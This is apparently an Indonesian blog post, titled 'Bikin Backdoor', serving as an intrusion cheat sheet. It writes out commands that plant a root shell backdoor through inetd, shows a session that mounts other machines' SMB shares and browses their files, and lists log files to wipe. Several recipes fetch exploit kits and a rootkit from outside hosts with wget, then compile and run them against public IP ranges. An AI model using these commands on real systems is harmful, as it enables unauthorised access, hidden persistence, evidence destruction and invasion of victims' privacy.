Bikin Backdoor

==================================================================
BIKIN BACKDOOR
==================================================================
echo “kuntua 1979/tcp” >> /etc/services
echo “dial stream tcp nowait root /bin/sh sh -i” >> /etc/inetd.conf kill -HUP 135
telnet dengan port “1979”
==================================================================
http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
==================================================================
[root@gila /]#rpm -qa | grep samba

samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36

[root@gila /]# arp -n

Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1

[root@gila /]# nmblookup -d2 ‘*’ #untuk mendeteksi netbios

Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )

[root@gila /]# locate findsmb
/usr/bin/findsmb

[root@router /]# findsmb

IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
—————————————–
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]

[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
——— —- ——-
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication

[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/

[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98

[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
==================================================================
bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
==================================================================
gcc sco-pop.c -o sco-pop
./sco-pop http://www.target.com
/var/adm
==================================================================
: BERSIHKAN LOG :
==================================================================
ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
==================================================================
securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org
==================================================================
repsec.com|iss.net|checkpoint.com|infowar.com|
==================================================================
li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org
==================================================================
harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu|
==================================================================
http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|
==================================================================
1. wget http://www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
==================================================================
1. wget http://www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
==================================================================
1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0x15 -v 212.70.224.129
==================================================================
1. wget http://www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
==================================================================
1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
==================================================================
1. wget http://www.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
==================================================================
1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
==================================================================
1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning
./sambal -d 0 -C 60 -S IP | grep samba
./sambal -b 0 -v IP <=== attack
==================================================================
SecureCRT: http://www.vandyke.com/
TTSSH: http://www.zip.com.au/~roca/ttssh.html
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html
SecureShell: http://public.srce.hr/~cigaly/ssh/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s